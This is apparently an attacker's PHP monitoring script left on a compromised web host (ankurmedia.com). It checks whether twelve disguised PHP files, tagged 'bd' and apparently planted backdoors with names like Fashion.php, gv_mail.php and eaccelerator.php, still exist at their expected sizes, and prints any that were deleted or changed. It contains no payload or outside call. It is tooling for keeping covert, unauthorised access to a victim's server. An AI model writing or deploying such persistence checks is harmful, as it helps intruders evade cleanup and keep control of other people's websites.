<?php $r = '/home/analuakl/ankurmedia.com'; $x = ["/GMR/image/Fashion.php"=>"bd@@1310987@@920",
"/GMR/css/gv_mail.php"=>"bd@@1311037@@1087",
"/js/jquery/mxml.php"=>"bd@@1306175@@1022",
"/js/video/category_item.php"=>"bd@@1311099@@1044",
"/GMR/month/theme_sidebar.php"=>"bd@@1313443@@945",
"/GMR/js/logger.php"=>"bd@@1385645@@911",
"/js/portfolio/eaccelerator.php"=>"bd@@1385650@@1031",
"/GMR/save.php"=>"bd@@1385657@@927",
"/images/video/pmd_pdf.php"=>"bd@@1385663@@884",
"/images/ott/logger_render.php"=>"bd@@1385666@@937",
"/nsd/datafile_func.php"=>"bd@@1313503@@959",
"/tv&radio.php"=>"bd@@1313534@@986"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');